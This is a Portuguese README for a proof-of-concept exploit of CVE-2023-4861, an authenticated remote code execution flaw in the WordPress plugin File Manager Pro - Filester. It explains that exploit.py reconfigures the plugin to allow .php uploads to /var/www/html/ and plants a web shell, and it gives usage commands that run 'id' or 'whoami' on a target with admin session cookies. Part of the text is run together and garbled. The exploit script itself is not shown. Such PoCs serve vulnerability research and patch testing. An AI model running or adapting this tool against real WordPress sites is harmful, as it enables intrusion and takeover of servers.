
Proof of Concept for CVE-2023-4861 in Filester
Este repositório contém uma prova de conceito em Python para a CVE-2023-4861, um problema de execução remota de código autenticada no plugin WordPress File Manager Pro - Filester.
CVE-2023-4861File Manager Pro - Filester (filester)< 1.8.11.8.1Admin+ no Filesterexploit.py automatiza o mesmo resultado básico descrito no aviso público:
/var/www/html/ e permitir upload de .php.Detalhe importante da implementação: meu PoC assume que a raiz web alvo é /var/www/html/. Isso está codificado nos dados da requisição e pode precisar de ajustes para outras configurações de laboratório.
Clone o repositório e entre nele:
git clone https://github.com/nomaisthere/CVE-2023-4861-PoC.git
cd CVE-2023-4861-PoC
Instale as dependências:
pip install requests
Mostrar ajuda:
python3 exploit.py --help
Exemplo básico:
python3 exploit.py --url http://target-wordpress --command id \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'
Nome de shell personalizado opcional:
python3 exploit.py --url http://target-wordpress --shell-name shell.php --command whoami \
--cookie 'wordpress_logged_in_xxx=...; wordpress_sec_xxx=...'